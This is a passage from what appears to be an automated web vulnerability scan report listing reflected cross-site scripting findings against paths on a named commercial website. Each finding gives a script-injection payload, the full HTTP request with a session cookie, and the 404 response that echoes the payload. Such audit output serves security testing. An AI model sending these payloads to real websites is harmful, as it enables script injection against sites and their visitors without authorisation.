<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult69307<script>alert(1)</script>77f21c2224c/media-chat/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.65. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7ae9f<script>alert(1)</script>45ac1be0e1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat7ae9f<script>alert(1)</script>45ac1be0e1c/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat7ae9f<script>alert(1)</script>45ac1be0e1c/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.66. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8cd9d<script>alert(1)</script>3586c450c08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes8cd9d<script>alert(1)</script>3586c450c08/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes8cd9d<script>alert(1)</script>3586c450c08/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.67. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4bb38<script>alert(1)</script>6c60b3a4d06 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos4bb38<script>alert(1)</script>6c60b3a4d06/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos4bb38<script>alert(1)</script>6c60b3a4d06/images/ was not found on this server.</p>
...[SNIP]...

2.68. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 124d1<script>alert(1)</script>13e4338a152 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images124d1<script>alert(1)</script>13e4338a152/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images124d1<script>alert(1)</script>13e4338a152/ was not found on this server.</p>
...[SNIP]...

2.69. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6f3cb<script>alert(1)</script>110819ca4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/?6f3cb<script>alert(1)</script>110819ca4a2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/?6f3cb<script>alert(1)</script>110819ca4a2=1 was not found on this server.</p>
...[SNIP]...

2.70. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 562c9<script>alert(1)</script>9dd835d5691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult562c9<script>alert(1)</script>9dd835d5691/media-chat/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult562c9<script>alert(1)</script>9dd835d5691/media-chat/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.71. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 51dbd<script>alert(1)</script>2b28f8ccf69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat51dbd<script>alert(1)</script>2b28f8ccf69/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat51dbd<script>alert(1)</script>2b28f8ccf69/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.72. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9d67b<script>alert(1)</script>2b583d4532a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes9d67b<script>alert(1)</script>2b583d4532a/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes9d67b<script>alert(1)</script>2b583d4532a/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.73. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19acd<script>alert(1)</script>c99a2f11ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos19acd<script>alert(1)</script>c99a2f11ed/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos19acd<script>alert(1)</script>c99a2f11ed/images/rating/ was not found on this server.</p>
...[SNIP]...

2.74. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a0d0c<script>alert(1)</script>50cdd7234e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/imagesa0d0c<script>alert(1)</script>50cdd7234e9/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/imagesa0d0c<script>alert(1)</script>50cdd7234e9/rating/ was not found on this server.</p>
...[SNIP]...

2.75. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload da910<script>alert(1)</script>5a116ab659b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/ratingda910<script>alert(1)</script>5a116ab659b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/ratingda910<script>alert(1)</script>5a116ab659b/ was not found on this server.</p>
...[SNIP]...

2.76. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 44656<script>alert(1)</script>f868fe0e423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/?44656<script>alert(1)</script>f868fe0e423=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/?44656<script>alert(1)</script>f868fe0e423=1 was not found on this server.</p>
...[SNIP]...

2.77. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5921b<script>alert(1)</script>58dfe0bd91d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult5921b<script>alert(1)</script>58dfe0bd91d/media-chat/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult5921b<script>alert(1)</script>58dfe0bd91d/media-chat/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.78. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload de5ec<script>alert(1)</script>2e2e58c71b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chatde5ec<script>alert(1)</script>2e2e58c71b3/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatde5ec<script>alert(1)</script>2e2e58c71b3/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.79. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6b948<script>alert(1)</script>97ff2aafdb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes6b948<script>alert(1)</script>97ff2aafdb7/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes6b948<script>alert(1)</script>97ff2aafdb7/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.80. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0c6d<script>alert(1)</script>3dd5a21c8da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmosa0c6d<script>alert(1)</script>3dd5a21c8da/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmosa0c6d<script>alert(1)</script>3dd5a21c8da/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.81. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f9af<script>alert(1)</script>874b109a938 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images5f9af<script>alert(1)</script>874b109a938/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images5f9af<script>alert(1)</script>874b109a938/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.82. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a0961<script>alert(1)</script>ceae5019b7e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/ratinga0961<script>alert(1)</script>ceae5019b7e/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/ratinga0961<script>alert(1)</script>ceae5019b7e/0.gif was not found on this server.</p>
...[SNIP]...

2.83. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c511b<script>alert(1)</script>4c48cb9771f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/0.gifc511b<script>alert(1)</script>4c48cb9771f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/0.gifc511b<script>alert(1)</script>4c48cb9771f was not found on this server.</p>
...[SNIP]...

2.84. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
